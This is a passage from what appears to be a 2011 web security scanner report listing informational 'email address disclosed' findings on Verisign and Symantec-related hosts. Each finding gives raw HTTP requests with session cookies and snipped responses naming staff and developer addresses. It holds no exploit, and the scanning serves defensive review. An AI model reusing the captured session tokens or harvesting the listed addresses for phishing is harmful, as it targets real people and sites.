The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.16. https://knowledge.verisign.ch/support/mpki-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The following email addresses were disclosed in the response: channel-partners@verisign.com, support@verisign.ch
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]... <a target="_blank" href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch </a>...[SNIP]... <a href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch </a>...[SNIP]...
17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/apps/infocenter/sites/verisign/js/jquery.hover_intent.js
Issue detail
The following email address was disclosed in the response:
Request
GET /apps/infocenter/sites/verisign/js/jquery.hover_intent.js HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=44BE2FA4819F216406CBA2DF030D4F7C
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:29 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "34cc8-64e-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1614 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: application/x-javascript /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]... <brian@cherne.net >...[SNIP]...
17.21. https://knowledge.verisign.com/support/code-signing-support/index
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.22. https://knowledge.verisign.com/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/code-signing-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.23. https://knowledge.verisign.com/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/digital-id-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.24. https://knowledge.verisign.com/support/eca-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/eca-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/eca-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js
Issue detail
The following email addresses were disclosed in the response: joshs@santsys.com, jsantomieri@verisign.com
Request
GET /support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623558|PC#1315621455064-973488.19#1378693698|check#true#1315621758
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:52 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "345a8-71a-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1818 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: application/x-javascript .../* InstantService Smart Button Integration VeriSign, Inc Developer: Josh Santomieri (jsantomieri@verisign.com , joshs@santsys.com ) Date: 1/8/2010 Requirements: This script requires jQuery (http://www.jquery.com). */ function SmartButtonHandler() { var self = this; this.parse = function() { $('div[type...[SNIP]...
17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:51 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 42730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/mpki-for-ssl-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.28. https://knowledge.verisign.com/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js
Issue detail
The following email addresses were disclosed in the response: joshs@santsys.com, jsantomieri@verisign.com
Request
GET /support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:34 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "345a8-71a-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1818 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: application/x-javascript .../* InstantService Smart Button Integration VeriSign, Inc Developer: Josh Santomieri (jsantomieri@verisign.com , joshs@santsys.com ) Date: 1/8/2010 Requirements: This script requires jQuery (http://www.jquery.com). */ function SmartButtonHandler() { var self = this; this.parse = function() { $('div[type...[SNIP]...
17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/trust-seal-support/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js
Summary
Severity: Information
Confidence: Certain
Host: http://partnerlocator.symantec.com
Path: /static/prod_plocator_s_code.js
Issue detail
The following email address was disclosed in the response:
Request
GET /static/prod_plocator_s_code.js HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:41 GMT Content-Type: application/x-javascript Content-Length: 28714 Last-Modified: Fri, 02 Jul 2010 19:50:45 GMT Connection: keep-alive Accept-Ranges: bytes /* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ var s_account="symanteccom,veritasnonconsumer,symantecpartner" var s=s_...[SNIP]... =s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;" +"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc ^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t" +";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id...[SNIP]...
17.34. https://policy3.responsys.net/privacy.htm
Summary
Severity: Information
Confidence: Certain
Host: https://policy3.responsys.net
Path: /privacy.htm
Issue detail
The following email address was disclosed in the response:
Request
GET /privacy.htm HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive Referer: https://policy3.responsys.net/permission.htm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:06 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "1f21312-1bfd-486ed8d030880" Accept-Ranges: bytes Content-Length: 7165 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Responsys Privacy Policy</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> </head>...[SNIP]... <a href="mailto:privacy@responsys.com ">privacy@responsys.com </a>...[SNIP]... <a href="mailto:privacy@responsys.com ">privacy@responsys.com </a>...[SNIP]...
17.35. https://press.verisign.com/easyir/customrel.do
Summary
Severity: Information
Confidence: Certain
Host: https://press.verisign.com
Path: /easyir/customrel.do
Issue detail
The following email address was disclosed in the response:
Request
GET /easyir/customrel.do HTTP/1.1 Host: press.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: Servlet/3.0; JBossAS-6 Content-Length: 1286 Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- so that relative references will use absolute url from jsp and not from calling ...[SNIP]... <b>support@marketwire.com </b>...[SNIP]...
17.36. http://query.verisign.ch/search
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.ch
Path: /search
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.37. http://query.verisign.com/cluster.js
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.com
Path: /cluster.js
Issue detail
The following email address was disclosed in the response:
Request
GET /cluster.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 8783 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // Copyright 2006 Google Inc., All Rights Reserved // dspencer@google.com /** * @fileoverview * * This file is for the rendering of Clustered Search results * on the GSA. * * * The flow is: * * - User initiates search query and wants clustered results * * - Res...[SNIP]... * Tested under: * Firefox 1.5.0.7 (Linux) * Firefox 1.5.0.7 (WinXP) * Firefox 1.5.0.4 (Mac OS X 10.4.7) * * IE 6.0... (WinXP SP2) * * Safari (Mac OS X 10.4.7) * * @author dspencer@google.com * * @requires common.js * @requires xmlthtp.js * @requires uri.js */ /** * Name of conceptual clustering servlet in * servlet array in JSON dictionary. */ var CS_CONCEPTS_NAME = 'Concepts';...[SNIP]...
17.38. http://query.verisign.com/common.js
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.com
Path: /common.js
Issue detail
The following email address was disclosed in the response:
Request
